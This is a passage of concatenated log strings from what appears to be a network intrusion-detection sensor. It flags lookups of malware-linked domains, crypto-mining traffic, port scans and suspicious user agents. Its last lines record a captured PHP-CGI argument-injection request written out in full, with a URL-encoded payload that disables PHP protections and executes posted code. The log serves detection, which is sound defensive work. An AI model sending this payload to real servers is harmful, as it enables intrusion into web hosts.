    '"2021-01-11 02:23:18.232976" r2d2 2.200.110.233 64140 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 02:23:19.582661" r2d2 2.200.110.232 49302 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:23:21.304856" r2d2 2.200.107.146 23730 194.0.11.104 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:23:21.302895" r2d2 2.200.110.233 65033 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:23:28.840853" r2d2 10.43.192.103 57579 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:23:32.000657" r2d2 2.200.108.59 25307,25310,25315,25316,25317,25318,25320,25323,25324,25325,33828,34038,34150,34906,35018,35110,35172,35234,35858,36056,36216,36298,36884,36990,37208,37280,37624,38028,38098,38148,38418,38986,39520,39552,40152,40785,40786,41300,41842,42188,43598,44026,44038,44048,44494,45932,46910,46912,46913,46915,46917,46918,47032,47138,47382,47844,47970,50038,50502,50534,50602,51200,51522,51924,52238,52986,54716,55002,55014,56220,56976,57690,58226,58404,59042,59078,59524,60846 77.53.81.105 21,5178,6102,8307,9200,10750,11201,11238,12800,14080,14682,15925,16347,17180,17556,18070,18711,18850,20280,20871,22132,22429,24368,26494,28165,30102,30372,32091,32139,33167,34728,35062,35257,35640,37250,37503,38892,39075,40364,40602,43285,44096,44347,45929,47491,48275,48810,49533,50402,52064,52923,54228,55216,58936,59564,60241,62319,62362,63097,63230,63687,64483 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:23:32.000663" r2d2 2.200.108.59 25305,25307,25308,25309,25310,25312,25313,25315,25320,25325,32842,33552,33828,34150,34338,34892,34922,35234,35264,35858,36056,36128,36344,36362,37062,37208,37280,37624,38098,38148,38660,38700,39230,40152,40784,40785,40786,40787,40906,41300,41698,42188,42248,42374,42834,42838,44026,44038,44494,45932,46626,46911,46915,46916,46917,46918,47032,47680,49334,49648,49762,49772,50038,50104,50630,51218,51522,52986,54218,54366,54792,55014,55488,56234,56254,56976,56990,57246,58404,58884,59090,59302,60060,60096,60198,60566,60634 77.53.81.105 21,5178,6535,7424,7828,8162,9200,9355,9916,11238,12133,12800,14682,16824,17993,18070,20069,24368,25602,26018,26261,27014,28165,30102,30299,32139,32452,33167,34728,35062,35406,35449,36106,37451,37607,39641,40364,40587,40602,43100,44096,45155,45983,47797,48275,48516,49951,50108,51401,52005,52064,52464,52923,52925,53890,54228,55497,56748,57115,58006,58795,60241,60408,61709,62362,63230,63732,63925,64483 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:23:31.000231" r2d2 2.200.108.59 25296,25297,25299,25300,25302,25303,25306,25309,25311,25312,25314,25317,25318,25319,25321,25322,25323,32842,32976,33482,33552,34038,34338,34892,34906,34922,35018,35110,35496,36818,36884,37036,37062,38660,39230,39306,39422,39456,39552,39864,40783,40906,41698,41826,42088,42248,42374,42838,42858,43598,44048,44268,44294,45714,46382,46908,46910,46912,46914,46918,47382,47640,47680,47844,47970,48074,49334,49762,49772,49976,50502,50534,50602,50630,51200,51212,51846,51924,52414,53456,54028,54366,54716,55002,55488,55864,55970,56234,56990,58226,58884,58974,59090,59302,60096,60634,60846 77.53.81.105 21,6102,6535,7137,7424,8162,8307,9916,10750,11158,11201,12133,12452,14080,17556,18350,19111,20871,22132,22174,23054,23859,24279,26018,26261,26766,27014,28297,29028,29049,30372,30508,30762,31658,32091,32452,33354,34704,35406,35640,36106,36255,37250,37607,37631,38892,40901,41012,43100,43285,44347,45155,48516,48810,49533,50108,50402,51401,52450,52464,53720,53890,54904,55216,56012,56748,57115,58006,58795,60408,61709,62378,63167,63687,63732,63925 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:23:40.915165" r2d2 10.43.192.103 57581 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:23:46.944467" r2d2 10.43.192.103 57582 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:23:49.872144" r2d2 10.1.81.47 61964 10.1.20.50 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 02:23:51.504278" r2d2 10.1.19.42 59398 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:23:59.008802" r2d2 10.43.192.103 57584 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:23:59.608369" r2d2 2.200.110.232 63918 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:23:59.611089" r2d2 2.200.107.146 46504 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:23:59.627201" r2d2 2.200.110.232 63649 2.200.107.168 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:24:17.092480" r2d2 10.43.192.103 57587 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:24:29.005516" r2d2 2.200.110.233 63421 2.200.107.169 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 02:24:29.006905" r2d2 2.200.107.146 27534 190.202.128.43 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 02:24:29.148476" r2d2 10.43.192.103 57589 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:24:29.613334" r2d2 2.200.110.232 64796 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:24:29.614947" r2d2 2.200.107.146 23587 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:24:29.641264" r2d2 2.200.110.233 63600 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:24:35.181152" r2d2 10.43.192.103 57590 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:24:47.250429" r2d2 10.43.192.103 57592 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:25:05.347403" r2d2 10.43.192.103 57595 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:25:17.399526" r2d2 10.43.192.103 57597 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:25:13.555029" r2d2 10.1.19.42 59440 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:25:23.433308" r2d2 10.43.192.103 57598 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:25:37.295881" r2d2 2.200.110.232 64224 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:25:37.375071" r2d2 2.200.110.232 64129 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:25:37.395368" r2d2 2.200.110.232 63971 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 02:25:37.395251" r2d2 2.200.110.232 65167 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:25:37.397202" r2d2 2.200.107.146 56319 192.5.6.30 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 02:25:37.427153" r2d2 2.200.110.233 63664 2.200.107.169 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 02:25:37.438553" r2d2 2.200.110.233 64377 2.200.107.169 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:25:37.446424" r2d2 2.200.110.232 64083 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:25:37.487001" r2d2 2.200.110.233 64749 2.200.107.169 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:25:37.665607" r2d2 2.200.110.232 49340 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:25:37.675451" r2d2 2.200.110.232 49369 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:25:37.678867" r2d2 2.200.107.146 16159 52.58.214.33 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:25:37.703317" r2d2 2.200.110.233 64510 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:25:37.745326" r2d2 2.200.110.232 64912 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:25:37.766466" r2d2 2.200.110.232 63728 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 02:25:38.485313" r2d2 2.200.110.232 49268 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 02:25:38.755434" r2d2 2.200.110.232 63723 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 02:25:39.205304" r2d2 2.200.110.232 63875 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 02:25:39.646685" r2d2 2.200.110.232 49489 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:25:39.674566" r2d2 2.200.110.233 63645 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:25:41.533577" r2d2 10.43.192.103 57601 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:25:43.381850" r2d2 2.200.110.232 65440 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:25:43.383385" r2d2 2.200.107.146 19472 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:25:47.577027" r2d2 10.43.192.103 57602 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:25:59.651117" r2d2 10.43.192.103 57604 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:26:04.892952" r2d2 2.200.110.232 63811 2.200.107.168 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 02:26:07.467664" r2d2 2.200.110.232 63398 2.200.107.168 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 02:26:11.734943" r2d2 10.43.192.103 57607 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:26:23.822673" r2d2 10.43.192.103 57609 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:26:25.033538" r2d2 2.200.110.232 65515 2.200.107.168 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 02:26:25.034949" r2d2 2.200.107.146 1617 185.104.28.19 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 02:26:29.870859" r2d2 10.43.192.103 57612 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:26:32.191240" r2d2 10.3.160.42 26032 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:26:32.291430" r2d2 10.3.160.42 26032 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:26:32.391406" r2d2 10.3.160.42 26032 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:26:32.591563" r2d2 10.3.160.42 26032 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:26:33.299338" r2d2 10.3.160.42 26032 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:26:43.398956" r2d2 2.200.110.232 63548 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:26:47.970050" r2d2 10.43.192.103 57615 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:26:49.696896" r2d2 2.200.110.233 49307 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:26:55.609114" r2d2 10.1.19.42 59446 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:26:59.609688" r2d2 2.200.110.232 65387 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:27:04.292449" r2d2 2.200.105.226 59895 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:27:04.292465" r2d2 2.200.105.226 59895 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:27:04.292530" r2d2 2.200.105.226 59895 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:27:06.102559" r2d2 10.43.192.103 57620 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:27:09.461644" r2d2 2.200.110.232 49467 2.200.107.168 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:27:09.486508" r2d2 2.200.110.233 64087 2.200.107.168 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:27:09.889554" r2d2 2.200.110.232 63406 2.200.107.168 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 02:27:24.203736" r2d2 10.43.192.103 57623 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:27:36.252836" r2d2 10.43.192.103 57625 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:27:41.472009" r2d2 2.200.107.146 65363 3.92.64.194 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 02:27:41.470110" r2d2 2.200.110.233 64517 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 02:27:42.290190" r2d2 10.43.192.103 57626 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:27:45.438042" r2d2 2.200.107.168 53 2.200.110.232 63867 UDP DNS (leicon).it "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:27:45.438035" r2d2 2.200.107.168 53 2.200.110.232 63867 UDP DNS (leicon).it "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:27:54.353977" r2d2 10.43.192.103 57628 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:27:57.333157" r2d2 2.200.110.233 63372 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 02:27:57.339630" r2d2 2.200.110.232 49405 2.200.107.168 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 02:27:57.341216" r2d2 2.200.107.146 31197 156.154.100.20 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 02:27:57.367142" r2d2 2.200.110.233 65270 2.200.107.168 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 02:27:57.411917" r2d2 2.200.110.233 63319 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 02:27:59.621589" r2d2 2.200.110.232 64746 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:28:03.664611" r2d2 178.17.174.14 55338 2.200.109.24 80 TCP UA "IE0006_ver1 (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; IE0006_ver1;EN_GB\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:28:06.429002" r2d2 10.43.192.103 57631 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:28:03.664500" r2d2 178.17.174.14 55338 2.200.109.24 80 TCP UA "IE0006_ver1 (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; IE0006_ver1;EN_GB\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:28:03.664606" r2d2 178.17.174.14 55338 2.200.109.24 80 TCP UA "IE0006_ver1 (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; IE0006_ver1;EN_GB\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:28:18.499031" r2d2 10.43.192.103 57634 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:28:30.556334" r2d2 10.43.192.103 57636 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:28:43.053076" r2d2 2.200.110.232 64924 2.200.107.168 53 UDP DNS (td-username-db4-63-97).wix.com "free web hosting (suspicious)" (static)\n' +
    '"2021-01-11 02:28:43.382013" r2d2 2.200.110.232 63592 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:28:43.393805" r2d2 2.200.110.232 63893 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:28:43.397557" r2d2 2.200.107.146 47475 52.57.28.60 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:28:48.677621" r2d2 10.43.192.103 57639 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:28:54.707864" r2d2 10.43.192.103 57641 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:29:00.746932" r2d2 10.43.192.103 57642 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:29:07.713434" r2d2 2.200.110.233 63804 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:29:09.701879" r2d2 2.200.110.232 64333 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:29:09.703245" r2d2 2.200.107.146 44818 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:29:09.726814" r2d2 2.200.110.233 64118 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:29:12.838150" r2d2 10.43.192.103 57644 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:29:19.288064" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP HTTP "2.200.97.15(/cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:29:19.288059" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP HTTP "2.200.97.15(/cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:29:19.288065" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP HTTP "2.200.97.15(/cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:29:19.496871" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP HTTP "2.200.97.15(/cgi-bin/php5?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:29:19.496783" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP HTTP "2.200.97.15(/cgi-bin/php5?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:29:19.496866" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP HTTP "2.200.97.15(/cgi-bin/php5?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
